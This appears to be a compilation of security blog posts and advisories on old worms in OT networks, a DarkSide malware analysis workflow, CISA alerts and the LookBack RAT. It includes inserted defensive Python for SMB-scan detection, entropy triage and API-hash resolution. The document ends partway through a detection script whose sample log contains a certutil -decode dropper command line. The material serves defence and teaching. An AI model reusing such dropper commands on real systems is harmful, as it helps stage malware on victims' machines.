Operational technology (OT) — the networks that control industrial control system processes — faces a more complex challenge than its IT counterparts when it comes to updating operating systems and software to avoid known vulnerabilities. In some cases, implementation of a patch could lead to hours or days of costly downtime. In other cases, full mitigation would require net new purchases of potentially millions of dollars' worth of machinery to replace already functional systems simply because they are timeworn.
It’s no secret OT systems face this conundrum — and it’s become increasingly obvious cyber criminals are aware of this weakness, too. While there’s no shortage of recent headlines decrying the vulnerability of these systems to the more sophisticated malware commonly used by threat actors today, those conversations have overlooked another potential — yet equally serious — threat to OT: older malware still floating in the ether.
This is malware for which most systems have been patched and protected against, immunizing large swaths of networks and effectively dropping the older malware from the radar of IT teams (and headlines). Two examples of this kind of older malware include Conficker and WannaCry.
While occurrences of these malware types plaguing OT environments are relatively rare, they do occur — and often leave organizations combating a threat that was largely forgotten.
WannaCry: The Scourge of 2017… and Beyond
The WannaCry ransomware outbreak was a watershed for cybersecurity professionals in 2017 — a moment in time many in this industry will never forget. The fast-spreading worm that leveraged the EternalBlue exploit ended up affecting more than 200,000 devices in over 150 countries. From X-Force's perspective, WannaCry is the ransomware type they have most commonly seen at organizations with OT networks since 2018 — and, occasionally, WannaCry will even migrate into OT portions of the network itself.
One example of WannaCry infecting an OT network is Taiwan Semiconductor Manufacturing Company (TSMC) in 2018. Despite having robust network segmentation and cybersecurity practices in place, human error led to a vendor installing a software update on the OT portion of the network using a machine unknowingly infected with WannaCry ransomware. Because the laptop used for the software installation had been patched and was using an up-to-date operating system, it was not susceptible to the ransomware — but the OT network, on the other hand, was very susceptible.
The WannaCry ransomware spread quickly across TSMC’s network and infected several systems, since the OT network included multiple unpatched Windows 7 systems. The ransomware affected sensitive semiconductor fabrication equipment, automated material handling systems, and human-machine interfaces. It also caused days of downtime estimated to cost the company $170 million. CC Wei, the CEO of the company, said in a statement, “We are surprised and shocked. We have installed tens of thousands of tools before, and this is the first time this happened.” As a result of the incident, the company implemented new automated processes that would be less likely than human error to miss a critical security step.
WannaCry continues to affect organizations with OT networks, although — thankfully — X-Force observes such incidents much less frequently today than they did in 2018 and 2019, as many organizations are able to apply patches or identify workarounds to more effectively insulate networks from WannaCry.
Enter Conficker: Continuing to Emerge in 2021
An old worm — even older than WannaCry — that X-Force has observed on OT networks in 2021, however, is Conficker. This worm emerged in late 2008 as threat actors quickly leveraged newly released vulnerabilities in Microsoft XP and 2000 operating systems. Conficker seeks to steal and leverage passwords and hijack devices running Windows to run as a botnet. Because the malware is a worm, it spreads automatically, without human intervention, and has continued to spread worldwide for well over a decade.
Conficker — sometimes with different names and variants — is still present in some systems today, including in OT environments. As with WannaCry, the presence of legacy technologies and obsolete operating systems — including Windows XP, Windows Server 2003, and proprietary protocols that are not updated or patched as often as their IT network counterparts — make these environments especially vulnerable to Conficker. In addition, many legacy systems have limited memory and processing power, further constraining administrators’ ability to insulate them from infections such as Conficker or WannaCry, as the system will not even support a simple antivirus software installation.
The Conficker worm is particularly effective against Windows XP machines, especially unpatched versions, which are common in OT environments. The fast-spreading nature of the Conficker worm can be a challenge for network engineers — once infected, every Windows machine connected to the network could be impacted in as little as one hour. Since many OT environments are built on 20- to 30-year-old designs, partially modified to have connectivity for ease of access, they provide the ideal environment for even the simplest malware, Conficker included.
From Conficker infections X-Force has observed, the worm is able to affect human-machine interfaces (HMIs), which have transmitted network traffic initially alerting security staff of the infection. X-Force malware reverse engineering of the Conficker worm indicates that it exploits the MS08-067 vulnerability to initially infect the host. Fortunately, in some cases Conficker malware — even when present in OT environments — has not led to operational damage or product quality degradation. Of course, this may not be the case for all network architectures on which Conficker malware may appear.
Defending OT Networks from Old Malware: Lessons From the Trenches
Even though many OT environments are running obsolete software and network topographies, there are measures organizations can take to defend against older malware strains such as WannaCry and Conficker. Often, the highest priority in an OT environment is maximizing uptime, leaving little room for maintenance, re-design, updates and their associated downtime. Yet even within these confines, there are many measures organizations can take to decrease the opportunities for old malware to get onto, spread within, and negatively affect their network.
Some of these include:
1. Network segmentation: Micro-segment the networks within an OT environment. If different lines do not need to communicate with each other, there is no need to create and maintain a large network subnet for all systems. Improve reliability of systems by segregating those in smaller subnets and restricting traffic at boundaries. In addition, an industrial demilitarized zone (iDMZ) is your best ally for compartmentalization and network segmentation. Avoid dynamic host configuration protocol (DHCP) as much as possible; should you be required to use it, subnet it to the lowest possible net mask. Configure virtual local area networks (VLANs) if possible.
2. Know what you have: Systems older than 20 years probably do not have a good electronic record in a configuration management database (CMDB) and may be missing or have outdated network drawings. Reverse engineering this information during an incident is not productive, and ensuring assets and network information is maintained accurately can go a long way. Be aware of the IPs, MACs, operating systems, and software licenses in your asset inventory. Get to know your environment up to the revision date of your software. Make clear which users are allowed to log on to machines based on specific roles; if possible, link users to a machine’s serial number.
3. Harden legacy systems to maintain a secure configuration: Remove all unused users and revoke all unnecessary administrative privileges, remove all unused software, disable all unused ports (running a packet capture can help), and prohibit using these assets for personal use. Insecure configuration of endpoints can leave open vulnerabilities for exploitation by adversaries or self-propagating malware. Identify unused and unwanted applications and delete them to reduce the attack surface. Avoid proprietary protocols as much as possible, unless they are constantly updated; check for and use better, newer protocols that are standardized.
4. Continuous Vulnerability Management: A vulnerability management program allows organizations to reduce the likelihood of vulnerability exploitation and unauthorized network access by a malicious actor and is necessary to make informed vulnerability treatment decisions based on risk appetite and regulatory compliance requirements. All necessary security and safety relevant patches must be applied as soon as feasible. If it is not possible to patch the system, ensure other compensating security controls are implemented to reduce the risk. Identify the lowest demand times in a day or week and commit to having downtime and maintenance windows for patching and updating. Routinely check for advisories on ICS-CERT and note whether your vendors are impacted.
5. Reduce SMB Attack Surface: Both WannaCry and Conficker are known to exploit SMB. Server Message Block (SMB) is a network communication protocol used to provide shared access to services on a network, such as file shares and printers. Because of its prevalence in information technology environments, adversaries commonly use this protocol to move laterally within a compromised environment, interact with remote systems, deploy malware, and transfer files. Moreover, SMB can provide a convenient way to bypass Multi-Factor Authentication (MFA) and remotely execute code. To reduce the attack surface and the overall risk associated with SMB-based lateral movement, consider the following hardening measures:
Configure Windows firewall to DENY all inbound SMB communications to workstations. This control will disable inbound connections on TCP ports 139 and 445.
Audit server SMB requirements and explicitly DENY SMB inbound on servers that do not require the protocol as part of their functionality.
Consider disabling legacy versions of the SMB protocol and migrating business applications to SMB v3.1. This activity requires careful planning and risk evaluation due to its potential impact on business operations.
6. Avoid the use of Portable Media: Uncontrolled portable media significantly increase the risks to the legacy OT environments, as OT systems may not have the latest security patches to defend against newer attack methodologies. Uncontrolled and unsecured allowance of portable media can expose an OT network to exploits and unplanned outages and downtime.
Have a security policy for secure use of portable media in OT environments.
Ideally, strictly prohibit use of USB flash drives. Should there be an absolute necessity of using one, designate a single USB stick for any maintenance and re-format it every time you use it.
Implement processes and technical controls that adequately support the security policy requirements. Controls may include, but are not limited to the following:
Every use of the device is documented in the logbook
The devices are scanned on designated quarantine PCs to ensure robust AV scan before using on OT endpoints. Ensure that anti-malware software is configured to automatically scan portable media
Control the number of portable media devices approved to be used in the environment
Disable autorun and autoplay auto-execute functionality for removable media.
Consider implementing Secure Media Exchange solutions such as Honeywell SMX or OPSWAT MetaDefender.
7. Rehearse Disaster Recovery (DR) and Incident Response (IR) scenarios regularly: DR plans should be documented, reliable backups should be available, and OT personnel must have an understanding and intimate knowledge of how the system should be recovered. IR and DR exercises should be conducted regularly to build the muscle memory needed for reliable recovery. Educate your team about imminent security threats and make them part of the security process. As part of any plan, have a direct line with your organization’s CSIRT: your best play is always a fast response and a transparent environment, so be organized and report everything.
8. Employ network monitoring solutions: Firewalls, Access Control Lists (ACLs) and Intrusion Prevention Systems (IPS) can assist in keeping a close eye on traffic traversing your network. Check for new nodes or machines communicating with suspicious assets. If you employ an intrusion detection system (IDS), ensure your signatures are up to date. Even when monitoring for old malware, new signatures appear every day.
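Items 5 and 8 above both come down to watching SMB: a worm such as Conficker or WannaCry announces itself as one host opening connections to many distinct peers on TCP 445 or 139 in a short time, something no HMI or engineering workstation normally does. The following is an added example, not code from the original post, of that detection run over constructed firewall log lines. The log format, the host addresses, the 60-second window and the 10-peer threshold are all assumptions to tune per site.

```python
"""Flag worm-like SMB fan-out in firewall logs.

Added example, not code from the original post. The log format and all hosts
are constructed; the window and threshold are assumptions to tune per site.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SMB_PORTS = {139, 445}
WINDOW = timedelta(seconds=60)
MAX_DISTINCT_TARGETS = 10   # assumption: no legitimate OT host needs 10+ SMB peers per minute

# Constructed line format: "<ISO time>Z <fw> <ACTION> TCP <src>:<sport> -> <dst>:<dport>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ (?P<action>ALLOW|DENY) TCP "
    r"(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line: str):
    """Parse one log line into a dict, or return None for lines we do not understand."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"].replace("Z", "+00:00")),
        "src": m["src"],
        "dst": m["dst"],
        "dport": int(m["dport"]),
        "action": m["action"],
    }


def detect_smb_fanout(lines, window=WINDOW, threshold=MAX_DISTINCT_TARGETS) -> list:
    """One alert per source that reached >= threshold distinct SMB peers inside a window.

    DENY lines count as well: a worm probing hosts that refuse SMB is exactly
    the signal we want, and a blocked attempt still identifies the infected source.
    """
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["dport"] in SMB_PORTS:
            by_src[ev["src"]].append((ev["ts"], ev["dst"]))

    alerts = []
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end, (ts, _) in enumerate(events):
            while events[start][0] < ts - window:     # slide the window forward
                start += 1
            peers = {dst for _, dst in events[start:end + 1]}
            if len(peers) >= threshold:
                alerts.append({
                    "src": src,
                    "distinct_targets": len(peers),
                    "first_seen": events[start][0].isoformat(),
                    "last_seen": ts.isoformat(),
                })
                break                                  # one alert per source is enough
    return alerts


def _ts(offset_s: int) -> str:
    return (datetime(2021, 6, 1, 10, 0, 0) + timedelta(seconds=offset_s)).isoformat() + "Z"


# Constructed sample log: an HMI (10.1.2.10) talking to two file servers, one
# unparseable line, and a host (10.1.2.77) sweeping 15 neighbours on 445 in 15 s.
SAMPLE_LOG = [
    f"{_ts(1)} fw01 ALLOW TCP 10.1.2.10:49152 -> 10.1.2.50:445",
    f"{_ts(3)} fw01 ALLOW TCP 10.1.2.10:49153 -> 10.1.2.60:80",
    f"{_ts(5)} fw01 ALLOW TCP 10.1.2.10:49154 -> 10.1.2.50:445",
    f"{_ts(9)} fw01 ALLOW TCP 10.1.2.10:49155 -> 10.1.2.50:445",
    f"{_ts(20)} fw01 ALLOW TCP 10.1.2.10:49156 -> 10.1.2.51:445",
    "this line is not in the expected format",
] + [
    f"{_ts(30 + i)} fw01 {'ALLOW' if i % 2 else 'DENY'} TCP 10.1.2.77:{50000 + i} -> 10.1.2.{i + 1}:445"
    for i in range(15)
]


if __name__ == "__main__":
    for alert in detect_smb_fanout(SAMPLE_LOG):
        print(alert)
```

Feed the function a real firewall or NetFlow export after adjusting `LINE_RE`; the one-alert-per-source rule keeps a single infected machine from flooding the console while it sweeps a subnet.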
While it isn’t common for an OT network to be infected with older malware like WannaCry or Conficker, documented cases do indeed exist, and they can leave costly destruction and even safety consequences in their wake.
To learn how X-Force can keep your network safer, download the X-Force for OT solution brief.
Read the 2022 X-Force Threat Intelligence Index Report to understand the latest OT Threats
The post Where Everything Old is New Again: Operational Technology and Ghost of Malware Past appeared first on Security Intelligence.
Analyzing New Malware
In the ever-changing world of cybersecurity, new threats appear and evolve on a regular basis. Sharing information about them is an important part of fighting cybercrime and keeping people and organizations safe. To do so efficiently, being prepared will make the best use of your—and your team’s—time when analyzing an emerging threat.
In this blog, we cover various situations that researchers encounter when they need to publish their findings and provide some suggestions on how to approach them, along with a suggested workflow for approaching the analysis most efficiently. Finally, we apply this strategy to analyze a ransomware sample.
Efficient analysis is extremely important when investigating new malware.
Challenges and Solutions
When a new threat emerges, there are a few common challenges that researchers face during analysis. Here are a few ways to handle them so you can produce clear and purposeful findings.
Urgency
In many cases, there is a relatively narrow window of time in which to release the publication, if we want the topic to be hot and the corresponding material to be relevant.
The solution is to focus on the most important questions that need answers.
Who are the potential readers of the article? How will they benefit from reading it?
How will the time costs associated with each section compare to its benefits?
Beginning your work by answering these questions will help shape the material in the right direction and manage time properly.
Novelty
For many attacks that hit the news, the related malware may not yet have been analyzed by other researchers. This increases the amount of work required to understand all parts of the relevant functionality, as there is little to no information to use as a starting point.
To address this issue, it is worth remembering that in many cases, modern malware families and attacker groups already have some roots. Tracking these connections allows researchers to find previous iterations of similar projects and reduce the amount of time required to understand malware’s functionality.
Complexity
The consequences of simple cyberattacks aren’t generally big enough to attract the attention of the public. What that means for researchers is that if something is worth writing an article about, it’s likely to be quite complex and therefore time-consuming to analyze.
The solution here might be to split the big task into smaller tasks. Apart from allowing prioritization based on the article's focus, it also allows the analysis to be done by a group, with different people focusing on different parts of the functionality. Exchanging knowledge on a regular basis about what has already been covered will help the team to be efficient and not waste time analyzing the same parts multiple times.
Suggested Workflow
Here is a common workflow that allows researchers to approach the analysis of new executable samples efficiently and effectively. The second step, behavioral analysis, is black-box analysis: executing the sample under monitoring tools and in sandboxes. The dynamic analysis in step 4 refers to stepping through instructions in a debugger.
1. Triage
- Collect as much easily accessible open information as possible: existing articles, public sandbox reports, other vendors' detections.
- Check for high-entropy blocks, the size of the import table (or the use of direct syscalls) and the visible strings, to judge whether the sample is likely to be packed.
- Run packer-detection tools to check whether a known (non-malicious) packer was used.
2. Behavioral Analysis
- Conduct this analysis only if the lab environment can be restored easily after execution.
- It may be unnecessary if good public sandbox reports already exist.
- Keep in mind that behavioral analysis often does not show the full picture.
- It may not go as expected because of anti-RE techniques in the sample.
3. Unpacking (optional)
- Not always needed: some malware developers use only obfuscation rather than a packer.
- For known packers, many unpacking tools and scripts already exist.
- Ideally the unpacked sample should remain executable so that dynamic analysis stays easy; otherwise recover as much unpacked code and data as possible.
4. Static and Dynamic Analysis of the Actual Functionality
- This step only becomes possible once unpacking is done (where it was necessary).
- Strings and APIs generally give the most information and serve as landmarks for navigating the sample.
- Keep the markup accurate: rename functions, create structures, define enums and leave comments where necessary.
- Debugging is mainly needed to decrypt/decode/decompress code and data and to resolve APIs; static analysis is generally enough for the rest.
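The entropy check from step 1, as an added example that is not part of the original post: it slides a window over a file, merges consecutive high-entropy windows into byte ranges and returns the numbers a triage note should record. The input is a constructed stand-in for a PE file (low-entropy header-like bytes followed by a pseudo-random block), not a real sample; the 1 KiB window and 7.0 bits/byte threshold are the example's own choices.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte: 0.0 for empty or
    single-valued data, 8.0 for perfectly uniform data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def find_high_entropy_blocks(data: bytes, window: int = 1024, threshold: float = 7.0):
    """Slide a fixed-size window over the file and merge consecutive windows whose
    entropy reaches the threshold into (start, end) byte ranges. Compressed,
    encrypted or packed data usually scores above 7.0; code and plain data below."""
    blocks = []
    current = None
    for offset in range(0, len(data), window):
        end = min(offset + window, len(data))
        if shannon_entropy(data[offset:end]) >= threshold:
            if current is None:
                current = [offset, end]
            else:
                current[1] = end
        elif current is not None:
            blocks.append(tuple(current))
            current = None
    if current is not None:
        blocks.append(tuple(current))
    return blocks


def build_sample() -> bytes:
    """Constructed stand-in for a PE file (not a real sample): 4 KiB of
    low-entropy header/code-like bytes followed by a 2 KiB pseudo-random block,
    mimicking an encrypted blob appended to the executable."""
    rng = random.Random(1337)  # fixed seed so the result is reproducible
    stub = b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.\r\n"
    body = (stub * 40)[:4096].ljust(4096, b"\x00")
    blob = bytes(rng.getrandbits(8) for _ in range(2048))
    return body + blob


def triage_summary(data: bytes) -> dict:
    """The numbers a triage note should record before any deeper analysis."""
    blocks = find_high_entropy_blocks(data)
    covered = sum(end - start for start, end in blocks)
    return {
        "size": len(data),
        "overall_entropy": round(shannon_entropy(data), 2),
        "high_entropy_blocks": blocks,
        "high_entropy_fraction": round(covered / len(data), 2) if data else 0.0,
    }


if __name__ == "__main__":
    print(triage_summary(build_sample()))
```

On a real file, read it into `data` and pair the block offsets with the section table (pefile's `pe.sections`) to see whether the block is a section, an overlay appended after the last section, or a resource; a near-empty import directory (`pe.DIRECTORY_ENTRY_IMPORT`) alongside a large high-entropy region is the packed-or-obfuscated signal the text describes.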
Applying the Workflow to Malware Analysis
Let's take a look at a DarkSide ransomware sample, which we analyzed earlier this year (SHA-256): 0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9
Step 1: Triage
At the time of analysis the sample had already been uploaded to VirusTotal, so every member of the community could see the AV vendors' detections as well as the sandbox logs in the Behavior tab. VirusTotal now integrates multiple sandboxes, so try a few to find a good report.
Multiple sandbox options on Virustotal.
A quick look at the sample in the hex editor reveals that there is a high-entropy block at the end. There are multiple things it could be: the next stage payload or another module, a blob containing encrypted strings or configuration, etc. Static analysis will be required to understand it.
A high-entropy block.
There are almost no meaningful strings or APIs:
Very few entries in the import table.
This is a strong indicator that the sample is obfuscated, with APIs resolved dynamically and strings encrypted. Running a packer-detection tool (PEiD with community signatures) confirms that no known public packer was used.
PEiD did not identify any known packers.
Step 2: Behavioral Analysis
By the time the analysis began, the sample had already been submitted to several public sandboxes by other community members, so a lot of information could be taken from there.
File activity in the public any.run report.
Step 3: Unpacking
Checking cross-references to the high-entropy block in the disassembler shows that it is not a next-stage payload: there is no control transfer to it or to related blocks. A quick look around the disassembly also confirms that the sample is obfuscated rather than packed, with APIs resolved dynamically by hash and strings encrypted.
API resolution by hashes.
A call to the not-yet-resolved API.
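How hash-based API resolution is undone on the analyst's side, as an added example that is not from the original post or the DarkSide blog: the sample stores a hash per API and walks export tables until a name hashes to the same value, so the analyst precomputes the hashes of every export name and looks the constants up in reverse. The hash function here is the ROR13 scheme popularised by shellcode API resolvers, used only for illustration; DarkSide's own algorithm is different and is not reproduced. The export lists and the "constants read from the resolver" are assumptions made up for the example.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """ROR13 rolling hash over the export name plus its terminating NUL.
    Illustrative only: this is the classic shellcode API-resolver scheme, not
    DarkSide's hash function."""
    h = 0
    for byte in name.encode("ascii") + b"\x00":
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h


# Assumed export lists. A real table is generated from the DLLs' export
# directories (e.g. with pefile) so that every exported name is covered.
EXPORTS = {
    "kernel32.dll": ["VirtualAlloc", "VirtualProtect", "CreateFileW", "WriteFile",
                     "GetProcAddress", "LoadLibraryA", "CreateThread", "ExitProcess"],
    "advapi32.dll": ["CryptAcquireContextW", "CryptGenRandom", "OpenProcessToken",
                     "AdjustTokenPrivileges"],
    "ntdll.dll": ["NtQueryInformationProcess", "RtlAdjustPrivilege"],
}


def build_hash_table(exports=EXPORTS, hash_fn=ror13_hash) -> dict:
    """Map hash -> (dll, export). Collisions are reported rather than silently
    overwritten, because a wrong name propagated into the disassembly is worse
    than an unresolved one."""
    table = {}
    for dll, names in exports.items():
        for name in names:
            h = hash_fn(name)
            if h in table and table[h] != (dll, name):
                raise ValueError(f"hash collision {h:#010x}: {table[h]} vs {(dll, name)}")
            table[h] = (dll, name)
    return table


def resolve_hashes(hashes, table) -> dict:
    """Resolve the hash constants pulled from the sample's resolver routine.
    Unknown hashes stay None so they show up in the output for manual follow-up."""
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    table = build_hash_table()
    # Constructed: pretend these constants were read from the resolver function.
    wanted = [ror13_hash("VirtualAlloc"), ror13_hash("CryptGenRandom"), 0xDEADBEEF]
    for h, hit in resolve_hashes(wanted, table).items():
        print(f"{h:#010x} -> {hit[1] if hit else '<unresolved>'}")
```

Once the resolver's hash constants map to names, the same dictionary drives the renaming of the pointer slots the sample writes the resolved addresses into (in IDAPython, `idc.set_name()` on each slot), which is the static equivalent of the dynamic renimp.idc approach described below.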
Step 4: Static and Dynamic Analysis of the Actual Functionality
To navigate the disassembly efficiently, APIs and strings need to be readable.
For APIs this is easy with dynamic analysis, because all of them are resolved in a single function: let it run to completion and every API address is in place. To propagate the names to the pointers, use the standard renimp.idc script shipped with IDA Pro.
Resolved APIs’ names.
This approach won't work for strings, which are decrypted ad hoc just before use rather than in one place, so scripting is required to make them visible. Our DarkSide blog already provides a script that attempts to find and decrypt all the encrypted strings.
Before string decryption.
After string decryption.
That's it. With both strings and APIs visible, what remains is to work carefully through the cross-references, keeping the markup of the corresponding functions accurate and recording everything of potential interest (given the target audience) for the article.
Conclusion
Knowledge sharing is an important part of the cybersecurity field that allows us to quickly adapt to new threats and minimize their associated risks. By properly focusing our efforts, we can improve the quality of this process and make the world a safer place.
Extra Tips
Know your audience: the content of a technical blog post (and the questions it must answer) differs greatly from a news article for the general public.
Consider teamwork to speed up the process: asking for help at an early stage increases the total analyst time available.
Have your templates ready: simple scripts to decrypt, decode or decompress data help avoid unnecessary delays.
Related Links
Blog: BlackMatter Ransomware Technical Analysis and Tools from Nozomi Networks Labs
Blog: Critical Log4shell (Apache Log4j) Zero-Day Attack Analysis
Blog: Colonial Pipeline Ransomware Attack: Revealing How DarkSide Works
Blog: Enhancing Threat Intelligence with the MITRE ATT&CK Framework
The post How to Analyze Malware for Technical Writing appeared first on Nozomi Networks.
Original release date: July 7, 2021 | Last revised: July 8, 2021
CISA has published a new Malware Analysis Report (MAR) on DarkSide ransomware and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete the Volume Shadow Copies available on the system.
CISA encourages users and administrators to review the following resources for more information:
AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1
This product is provided subject to this Notification and this Privacy & Use policy.
Original release date: April 22, 2021
CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response, providing analysis of a compromise of an organization's enterprise network by an advanced persistent threat actor. The report describes the tactics, techniques and procedures CISA observed during the incident response engagement.
CISA encourages organizations to review AR21-112A for more information.
Original release date: April 15, 2021
CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.
The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).
CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information:
CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
Original release date: March 17, 2021
CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals are using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.
To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA’s Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.
A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.
An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.
An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…
Expert launches Malvuln, a project to report flaws in malware: the security researcher John Page (aka hyp3rlinx) has launched malvuln.com, the first website dedicated exclusively to research on security flaws in malware code.
Publication date: 11/20/2020
Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.
These services had been offered on the underground market since 2010 for no more than $300 per license, with regular updates and customer support, and had been used by more than 1,560 cybercriminals with different types of malware.
The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.
Tags: Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures
References:
- Romanian duo arrested for running malware encryption service to bypass antivirus software (europol.europa.eu, 20/11/2020): https://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software
- Romanians arrested for running underground malware services (securityaffairs.co, 22/11/2020): https://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html
- Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malware (seguridadyfirewall.cl, 23/11/2020, in Spanish): https://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html
Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.
A severe vulnerability exists in almost all signed versions of GRUB2, which most Linux systems use. Properly exploited, it would let attackers compromise the system's boot process even when the Secure Boot verification mechanism is active.
The flaw was reported by Eclypsium on July 29, although the associated CVE-2020-10713 is dated March 20. While GRUB2 is most directly associated with Linux systems, dual-boot (or multi-boot) machines open the door to exploitation against other systems such as Windows.
A flaw was found in grub2 versions prior to 2.06. An attacker can use the GRUB 2 flaw to hijack and tamper with the GRUB verification process, which also allows Secure Boot protections to be bypassed. To load an untrusted or modified kernel, the attacker would first need access to the system: physical access, the ability to alter a PXE boot network, or remote access to a networked system with root privileges. With that access, the attacker could forge a string that causes a buffer overflow by injecting a malicious payload, leading to arbitrary code execution within GRUB. The greatest threat from this vulnerability is to data confidentiality and integrity, as well as system availability.
https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713
According to BleepingComputer's report, Eclypsium has shared the vulnerability with operating system vendors, computer manufacturers and CERTs/CSIRTs. Advisories and possible mitigations from multiple organizations in the industry are expected to be published today.
We see this problem as having a low probability of occurrence, or at least a high difficulty, since, as the CVE text indicates, special conditions are required before the vulnerability can be exploited. That does not mean we can relax; rather, we should keep a close eye on the updates that will arrive from the various vendors.
Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.
On August 1, security researchers at Proofpoint reported details of a spearphishing campaign that targeted three United States utility companies with a malware called "LookBack." The spearphishing emails, sent between July 19 and July 25, carried a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of deleting files, taking screenshots, rebooting machines and then removing itself from the infected host.
While Proofpoint confirmed the presence of LookBack at three companies, the malware has likely reached other organizations as well. The emails falsely appeared to come from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit that handles professional licensing for engineers and surveyors, and even used the NCEES logo fraudulently. The attached Word documents contained malicious macros that, once opened, installed and ran the never-before-seen RAT.
Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.
How LookBack Works
According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.
Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.
The Word document attached to the phishing emails contains a VBA macro that, when executed, drops three Privacy Enhanced Mail (PEM) files. Certutil.exe is then dropped to decode the PEM files, which are subsequently restored to their true extensions using essentuti.exe. The files impersonate the name of an open-source binary used by common tools such as Notepad++, and include the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once running, LookBack can send and receive numerous commands, such as find files, read files, delete files, write to files, start services and more.
Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.
Given the nature of the threat, it is important to have multiple controls in place to detect the related activity. This includes continuous security awareness training so that employees and personnel can better identify fake and malicious emails. Beyond spam filters and firewalls, Nozomi Networks Labs recommends combining anomaly detection, to identify unusual behavior, with traditional threat detection, to provide additional context about suspicious actors tied to known threats.
Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. Alerts will now trigger on suspicious activity related to LookBack so that you can detect and remediate quickly. Customers using OT ThreatFeed should make sure their systems are running the latest version (from August 2, 2019) to enable these new rules.
With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.
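Host-side detection logic for the dropper chain described above, as an added example that is not part of the original post or of the OT ThreatFeed rules: it runs three rules over process-creation events (Office application spawning a child process, certutil.exe invoked with a decode or download switch, GUP.exe running outside the Notepad++ directory). The log lines are constructed in a flat key=value form with Sysmon Event ID 1 field names; the paths, file names and the assumption that the PEM decode uses certutil's -decode switch are the example's own.

```python
import re

# Constructed process-creation events (field names follow Sysmon Event ID 1).
# Paths and file names are made up for the example.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\certutil.exe"
    "|CommandLine=certutil -decode C:\\Users\\u\\AppData\\Local\\Temp\\part1.pem C:\\Users\\u\\AppData\\Local\\Temp\\GUP.exe"
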